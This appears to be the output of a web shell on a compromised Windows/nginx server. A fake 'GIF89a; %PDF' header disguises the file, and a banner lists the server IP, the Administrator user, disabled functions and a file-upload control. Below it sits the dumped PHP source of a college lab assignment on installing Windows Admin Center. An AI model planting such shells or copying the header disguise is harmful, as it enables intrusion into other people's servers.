GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2274/Labs/Lab06.5/ |
Upload File : |
<? // JimMartinson/CST2274/Labs/Lab06/Lab06.phpinc require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // ReplacedNaN #if ( $_SESSION['userId'] != 1 ) { require('Gradebook/EvaluationSubmission_NOTAVAILABLE.phpinc'); exit; } require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'. $disabled = ''; $disabled = ' disabled'; if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } $uploadFilename = $courseNumber.'_'.$evaluationName.'_'.$userFileName.'.png'; ?> <fieldset><legend>Description</legend> Demonstrate your ability to install and use Windows Admin Center on Core server. </fieldset> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <?=$gradeNote?> <ol class="count"> <!-- 1 --> <li> Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for all work performed in this lab. </li> <!-- 2 --> <li>Install Windows Admin Center on your 2019 Core Experience server (<b><?=$coreServerName?></b>). <ol> <li>Copy the Windows Admin Center .msi file to your core server. <span class="note">I did this with a share on my DE server and the <b>net use</b> command on my core server.</span> </li> <li>Run the installer with the command: <b class="kbd copyText">start WindowsAdminCenter2110.2.msi</b>. <span class="note">Check your filename as you may have a different version.</span> <br><span class="note normal">Since I had used msiexec to install WAC the first time I had to run it twice; Once to Remove it and again to get a complete installation.</span> </li> <li>Restart your Core server.</li> </ol> </li> <!-- 3 --> <li>From your Windows 10 VM: Open a browser and load Windows Admin Center with the URL:<b class="copyText">https://<?=$coreServerName?></b>.</li> <!-- 4 --> <li>Login to the Windows Admin Center with Username: Administrator and Password.</li> <!-- 5 --> <li>Select your <b><?=$coreServerName?></b> server.</li> <!-- 6 --> <li>Select Powershell from the tools menu and login.</li> <!-- 7 --> <li>Enter the command: <b class="kbd copyText">Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" InstallationType</b> </li> <!-- 8 --> <li>Take a screenshot that shows the Browser location bar and the Powershell window and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder. <br> <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/InstallationType.png" alt="Browser and Powershell output."/><br> <? showEnd (); ?> </li> <!-- 9 --> <li>Turn in your assignment: <ol type="a"> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </li> <? /**/ ?> </ol> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>